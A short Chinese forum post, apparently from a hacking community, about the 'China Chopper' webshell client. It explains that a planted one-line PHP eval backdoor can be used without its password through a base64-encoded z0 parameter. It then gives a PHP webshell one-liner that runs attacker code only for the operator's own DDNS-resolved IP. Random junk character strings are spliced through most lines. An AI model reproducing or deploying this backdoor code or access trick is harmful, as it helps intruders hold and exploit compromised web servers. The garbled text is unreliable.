今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞5 k# D6 k/ a( ^, |/ q
, U1 n! `' b$ l% ~6 a" j( C就算你设置了密码,使用了eval($_REQUEST['moyo']);
6 i, D$ M2 X% w
1 Z" g+ a& Z8 R. [但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门. O8 w( P- B# }* C) F! F, e
7 ~7 h/ h9 f- F( d3 i因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));# G! t- V- D; l$ V+ R) y* A) X
9 n. x; y6 \" l2 k* M2 L直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了' e6 U# G: U& I& P& T% ] |+ B1 ?
+ M/ Y( L+ ]- t* }0 \* y
不知道是设计缺陷还是故意留的后门) l' i# {0 W7 r; @5 @$ c" P
, N- k6 ?% Q8 F; P# R% v {
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
3 _3 c7 c6 g9 L& M& G- j' h: i: H) \3 O7 c% W$ w6 B# k
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org' D! l5 _9 N; b- K/ K& P: m7 ~2 K
1 e5 q' f+ k0 O( _
然后一句话后门这样写
2 E% I% i8 _! H7 w; |& i8 v; ^1 D0 h( m' X) L( N! B. s
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
2 `) g5 Y# ~0 o8 s$ k1 K这样就可以让一句话后门只允许自己的电脑连接了
9 |# s2 D4 ?' ^) }
; x' p$ W/ f# F4 d8 b7 M! P |